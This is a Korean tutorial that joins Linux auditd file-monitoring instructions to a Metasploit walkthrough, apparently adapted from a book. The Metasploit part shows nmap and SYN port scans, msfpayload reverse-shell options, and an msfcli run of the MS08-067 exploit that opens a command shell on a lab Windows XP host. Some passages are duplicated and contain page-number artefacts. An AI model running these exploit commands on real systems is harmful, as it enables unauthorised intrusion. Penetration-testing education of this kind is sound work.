구텐모르겐 AmeriKa

개요

시스템 관리자로써 관심있는 사항은 “어떻게 사용자들의 읽고 쓰는 것을 관리할 수 있을까? 어떻게 시스템의 무결성을 보장할 것인가?” 하는 점이다.

해결책은 2.6 커널의 audit시스템을 이용하는 것이다. 대부분의 리눅스에는 auditd 데몬이 깔려서 나오고 이는 사용자들의 디스크 액세스를 관리하게 된다. /etc/audit.rules를 통해 설정이 되고 audit.rules에서 로그의 경로나 다른 세팅을 바꿔줄 수 있다. 기본설정값으로 충분히 사용가능하기도 하다.

설치 및 실행

설치와 실행을 위해서 몇가지 필요한 툴이 있다.

auditctl: 커널의 audit시스템을 관리하고 상태, 추가, 삽입과 같은 시스템을 관리하고 특정파일에 대한 모니터링을 실시한다.

ausearch: 서치를 실행한다.

aureport: audit시스템의 리포트에 사용된다.

기본적으로 audit을 2.6 커널에 설치되어 있지만 그렇지 않다면 다음과 같이 설치해준다.

# yum install audit

그리고 서비스를 실행해보자

# /etc/init.d/auditd start

설치가 끝났다면 기능들을 설정해 보겠다. 우선 /etc/passwd 폴더의 변경을 검열하고 싶다면 아래와 같이 설정한다.

# auditctl -w /etc/passwd -p war -k password-file

위에서 –p war는 권한을 설정하는 것이고 w-write, x-execute, a-append 그리고 r-read의 권한을 부여하게 된다.

즉 위의 명령어를 통해 여러분은 쓰기, 추가, 읽기와 관련된 사항에 대한 로그를 받게 된다.

결과값 검색

누가 접근을 했고 어떤 변경을 하였는지는 다음의 명령어를 통해 알 수 있다.

# ausearch -f /etc/passwd

이에 대한 결과값은 아래와 같이 나오게 된다.

type=PATH msg=audit(03/16/2007 14:52:59.985:55) : name=/etc/passwd flags=follow,open inode=23087346 dev=08:02 mode=file,644 ouid=root ogid=root rdev=00:00

type=CWD msg=audit(03/16/2007 14:52:59.985:55) :  cwd=/webroot/home/lighttpd

type=FS_INODE msg=audit(03/16/2007 14:52:59.985:55) : inode=23087346 inode_uid=root inode_gid=root inode_dev=08:02 inode_rdev=00:00

type=FS_WATCH msg=audit(03/16/2007 14:52:59.985:55) : watch_inode=23087346 watch=passwd filterkey=password-file perm=read,write,append perm_mask=read

type=SYSCALL msg=audit(03/16/2007 14:52:59.985:55) : arch=x86_64 syscall=open success=yes exit=3 a0=7fbffffcb4 a1=0 a2=2 a3=6171d0 items=1 pid=12551 auid=unknown(4294967295) uid=lighttpd gid=lighttpd euid=lighttpd suid=lighttpd fsuid=lighttpd egid=lighttpd sgid=lighttpd fsgid=lighttpd comm=grep exe=/bin/grep

audit(03/16/2007 14:52:59:985:55)는 시간을 나타내고 uid=lighttpd gid=lighttpd는 사용자와 속한 그룹을 보여준다. -i옵션을 통해 수치를 문자로 변환할 수도 있다. exe=”/bin/grep”는 /etc/passwd에 접근하기 위해 해당명령어를 사용했다는 것을 보여주고 perm_mask=read 해당 파일을 읽었다는 뜻이다.

그러므로 위의 검색결과를 통해 lighttpd그룹의 lighttpd사용자가 grep명령어를 통해 passwd파일을 읽었음을 알 수 있다.

다른 유용한 기능

특정 시간을 검색하는 방법은 아래와 같다.

# ausearch -ts today -k password-file 

# ausearch -ts 3/12/07 -k password-file

특정한 행동에 대한 검색도 가능하다.

# ausearch -ts today -k password-file -x rm 
    
# ausearch -ts 3/12/07 -k password-file -x rm

어떠한 사용자가 접근했는지에 대한 검색도 가능하다.

# ausearch -ts today -k password-file -x rm -ui 506 
    
# ausearch -k password-file -ui 506

MSFconsole에서 Nmap 돌리기

msfbook 데이타베이스로 연결을 알아보겠다.

msf > db_connect postgres:toor@127.0.0.1/msf3

msfconsole에서 db_nmap 명령을 통해서 nmap을 사용할 수 있다.

msf > db_nmap -sS -A 172.16.32.131
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 172.16.32.131
Host is up (0.00056s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
21/tcp ..open ftp Microsoft ftpd
25/tcp open smtp Microsoft ESMTP 6.0.2600.2180 ..
80/tcp open http Microsoft IIS webserver 5.1
|_html-title:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM
3389/tcp open microsoft-rdp Microsoft Terminal Service
MAC Address: 00:0C:29:EA:26:7C (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003 ..
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: Host: ihazsecurity; OS: Windows
Host script results:
|_nbstat: NetBIOS name: IHAZSECURITY, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ea:26:7c
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: WORKGROUP\IHAZSECURITY
|_smbv2-enabled: Server doesn't support SMBv2 protocol
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 33.51 seconds

msf > db_services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.32.131 135 tcp msrpc open Microsoft Windows RPC
172.16.32.131 139 tcp netbios-ssn open
172.16.32.131 445 tcp microsoft-ds open Microsoft Windows XP microsoft-ds
172.16.32.131 777 tcp unknown open
172.16.32.131 1433 tcp ms-sql-s open Microsoft SQL Server 2005 9.00.1399; RTM

Metasploit를 이용한 포트 스캔

Nmap의 스캐닝 기능뿐만 아니라 Metasploit에 관한 포트스캐너에 대해도 알아보겠다. 이 스캐닝 기능을 통해서 타겟 호스트의 접근과 공격등 다양한 방법을 제시한다.

msf > search portscan

프토스캔의 리스트를 통해 scanner/portscan/syn에서 192.168.1.155을 스캔해보겠다.

msf > use scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(syn) > set THREADS 50
THREADS => 50
26 Chapter 3
msf auxiliary(syn) > run
 [*] TCP OPEN 192.168.1.155:135
[*] TCP OPEN 192.168.1.155:139
[*] TCP OPEN 192.168.1.155:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >msf > use scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(syn) > set THREADS 50
THREADS => 50
26 Chapter 3
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.155:135
[*] TCP OPEN 192.168.1.155:139
[*] TCP OPEN 192.168.1.155:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >

135, 139 그리고 445의 포트가 열려있음을 볼 수 있다.

Metasploit의 세가지 중요한 툴들을 알아봤다면 이제는 기능들에 대해 알아보겠다. 이 기능들은 Metasploit에 있는 기능들로써 특히 특정한 공격을 행할때 중요하게 사용된다.

MSFpayload: msfpayload기능은 shellcode를 Framework없이도 실행가능하게 만들어주는 기능을 한다. 이는 C, Ruby, JavaScript, Visual Basic과 같은 형태로 생성 가능하다. 가령 Python으로 작업중이라면 C언어형태로의 실행이 가능하고 웹에서 사용한다면 JavaScript의 형태가 가장 적당할 것이다. msfpayload -h를 통해서 기능들을 알 수 있다.

root@bt:/# msfpayload -h

msfcli와 같이 추가기능에 대해 알고자 하면 옵션 O를 넣어주면 된다.

root@bt:/# msfpayload windows/shell_reverse_tcp O

root@bt:~# msfencode -l

Nasm Shell: nasm_shell.rb는 어셈블리어를 사용할때 유용하고 각 코드를 알고자 할때 사용된다. 즉 jmp esp에 대한 내용을 알고자 할때 다음과 같이 사용된다.

root@bt:/opt/framework3/msf3/tools# ./nasm_shell.rb
nasm > jmp esp
00000000 FFE4
jmp esp

MSFconsole: Metasploit Framework에서 가장 핵심이 되는 부분으로써 가장 안정적이고 많은 기능을 제공하는 툴중에 하나이다. msfconsole은 Metasploit Framework에서 제공할 수 있는 모든 옵션을 구현가능하고 이 툴 하나만으로 exploit을 실행하거나, auxiliary modules을 실행하거나 하는 등의 모든 기능을 수행해 낼수 있다. 기본적으로 Metasploit Framework은 계속적으로 업데이트되면서 발전해나가는 툴이지만 msfconsole은 항상 변하지 않는 중요한 역할을 한다. 기본적인 msfconsole의 기능을 익힘으로써 다른 업데이트의 기능을 손쉽게 적용시킬수 있다. 아마도 이 msfconsole에 대한 이야기는 계속 하게 될듯하다.

MSFconsole의 실행: 컴멘드에서 (물론 백트랙5에서) msfconsole을 친다.

root@bt:/# cd /opt/framework3/msf3/
root@bt:/opt/framework/msf3# msfconsole
< metasploit >
------------
  \ ,__,
  \ (oo)____
      (__) )\
      ||--|| *
msf >

help명령어를 통해 기본적인 명령어들을 익힐 수 있다.

MSFcli: msfcli와 msfconsole는 Framework에 접속하는데 서로 다른 방법을 사용한다. msfconsole은 사용자적인 측면에서 모든 기능에 대한 접근이 가능하다면 msfcli는 다른 콘솔툴과의 스크립팅하는데 중심이 되어 있다. Framework에 값을 전달해주는 것이 아니라 컴멘드를 통해 다른 콘솔들과의 직접적인 연결을 가능하게 해준다. 또한 exploit와 auxiliary modules의 실행을 지원하고 또한 modules을 테스트할때에도 유용하게 사용된다. 만약 여러분이 정확히 어떠한 툴과 어떠한 기능을 사용할지에 대해 알고 있다면 msfcli가 msfconsole보다 확실히 여러분의 작업을 수행하는데 도움을 줄 것이다.

root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]
==============================================================================
Mode Description
---- ---------------
(H)elp You're looking at it, baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
root@bt:/opt/framework3/msf3#

MSFcli 예제: 이제 msfcli의 사용법에 대해 간단히 알아보겠다. 여러분이 Metasploit을 사용중에 어려움에 부딧힐때 옵션 O를 통해 많은 도움을 받을 수 있다. 예를 들어 아래와 같이 ms08_067_netapi를 사용할때 옵션 O를 붙이면,

root@bt:/# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 0.0.0.0 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

ms_08_067_netapi가 RHOST, RPORT, SMBPIPE의 세가지 옵션을 필요로 함을 알 수 있다. 또한 옵션 p를 사용함으로 사용가능한 payload를 알 수 있다.

root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...
Metasploit Basics 11
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell

root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

아래 윈도우 화면은 타겟 호스트이므로 이 exploit이 성공했음을 알 수 있다.

Armitage: armitage는 그래픽버전의 Metasploit라고 보면 된다. 물론 공짜이고 풍부한 기능과 편리성을 가지고 있다. 하지만 비록 armitage가 강력한 툴임은 사실이지만 컴멘드를 배우지 않고 클릭클릭만 배우다 보면 스크립트키디의 레벨을 벗어날 수 없으므로 armitage에 대한 설명은 하지 않고 넘어가겠다. 개인적으로도 nmap보다 zenmap사용후에 좀 더 기능을 효과적으로 사용하는데 한계를 느꼈다.

Armitage의 사용: armitage를 타이핑해주면 armitage가 실행된다. (물론 백트랙5에서 말이다.) armitage실행후 Attacks-Browser Attacks-windows 를 통해서 다양한 기능을 사용할 수 있음을 알 수 있다.